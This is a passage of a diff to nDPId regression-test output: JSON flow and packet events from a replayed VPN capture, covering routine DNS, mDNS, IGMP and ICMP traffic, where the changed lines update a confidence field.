00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569687246891,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1569687246891,"pkt":"LH6BsEqhNDY7z3UoCABFAAAzrdgAAP8Ra2cKAADjS0tMTPaDADUAH3AoGBgBAAABAAAAAAAABWxvY2FsAAAGAAE="} 
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1569687246924,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1569687246924,"pkt":"NDY7z3UoLH6BsEqhCABFAAB+AABAADYRofVLS0xMCgAA4wA19oMAah4oGBiBgwABAAAAAQAABWxvY2FsAAAGAAEAAAYAAQAAAyoAQAFhDHJvb3Qtc2VydmVycwNuZXQABW5zdGxkDHZlcmlzaWduLWdycwNjb20AeFjpQAAABwgAAAOEAAk6gAABUYA="} -00770{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":1,"num_answers":1,"reply_code":3,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569687246924,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687246924,"pkt":"LH6BsEqhNDY7z3UoCABFAAA4dQYAAEABY0UKAADjS0tMTAMDBdoAAAAARQAAfgAAQAA2EaH1S0tMTAoAAOMANfaDAGoAAA=="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.305435} 
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687246924,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.305435} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246981,"flow_last_seen":1569687246981,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246981,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569687246981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1569687246981,"pkt":"AQBeAAD7GIEORo7ICABFAACMDQUAAP8RwosKAADV4AAA+xTpFOkAeGDHAAAAAAADAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMgAEAACkFoAAAEZQAEgAEAA4AmjqBDkaOyBiBDkaOyA=="} 
-00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246981,"flow_last_seen":1569687246981,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246981,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246981,"flow_last_seen":1569687246981,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246981,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569687246982,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687246982,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AHgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QB4u70AAAAAAAMAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAyAAQAAKQWgAAARlAASAAQADgCaOoEORo7IGIEORo7I"} -00705{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 
+00705{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1569687246982,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687246982,"pkt":"AQBeAAACGIEORo7ICABGAAAgLwcAAAECCvoKAADV4AAAApQEAAAXAAgE4AAA+w=="} 
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00543{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 
00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1569687246982,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687246982,"pkt":"AQBeAAD7GIEORo7ICABGAAAg0EsAAAECaLwKAADV4AAA+5QEAAAWAAkE4AAA+w=="} -00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246982,"flow_last_seen":1569687246982,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687246982,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":200000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1569687247192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1569687247192,"pkt":"GIEORo7INDY7z3UoCABFAAEE6tAAAP8RumAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="} -00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":200000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":200000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5SAbt7aDM3a\/IufIAYEAAjBQAAAQEIChwNgekCYGB5FwMDADoAAAAAAAAABP6P4Nbq7ON\/6\/AGxu6nGVDbyH\/VD4ZdKbxLWPLfwYcNeZogzNp7TOtgIRax\/b1ZBFBO"} 00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5TAbsf\/fAfcO3V5YAYEADtVwAAAQEIChwNgekAjYToFwMDADoAAAAAAAAABVQHVjyN4wBxs8m+2i54okht8UdFndDP4vwtKiUe9j1LvsBOOnvld8r5j6XDOjeRQG2g"} 
00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1569687247596,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1569687247596,"pkt":"MzMAAAAWGIEORo7Iht1gAAAAACQAAf6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPANy0AAAAAQQAAAD\/AgAAAAAAAAAAAAAAAAD7"} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00626{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569687247596,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687247596,"pkt":"MzMAAAABLH6BsEqhht1gAAAAAHg6\/\/6AAAAAAAAALn6B\/\/6wSqH\/AgAAAAAAAAAAAAAAAAABhgBH5kDAALQAAAAAAAAAABkFAAAAAVGAIAEFWP7tAAAAAAAAAAAAASABBVj+7QAAAAAAAAAAAAIDBEDAAAL9HQAC\/R0AAAAAJgEGRoQCRLAAAAAAAAAAABgDAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAEBLH6BsEqh"} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569687248005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1569687248005,"pkt":"AQBeAAD7GIEORo7ICABFAACszwUAAP8RAGsKAADV4AAA+xTpFOkAmDTQAAAAAAADAAEAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEIX2hvbWVraXTAHAAMAAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMAAHADAAMAAEAAA4QABQRTFAtUktFUlVSLU9TWCAoOSnADAAAKQWgAAARlAASAAQADgCaOoEORo7IGIEORo7I"} 
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569687248006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"thread_ts_msec":1569687248006,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AJgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QCYj8YAAAAAAAMAAQAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAwAAQhfaG9tZWtpdMAcAAwAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAwAAcAMAAwAAQAADhAAFBFMUC1SS0VSVVItT1NYICg5KcAMAAApBaAAABGUABIABAAOAJo6gQ5GjsgYgQ5Gjsg="} 
@@ -106,20 +106,20 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0uJpAADgGjuC4GThNCgAA4wBQ3lUJPUQ9aK+croAQAOvt6gAAAQEICuMU+IIcDWN7"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 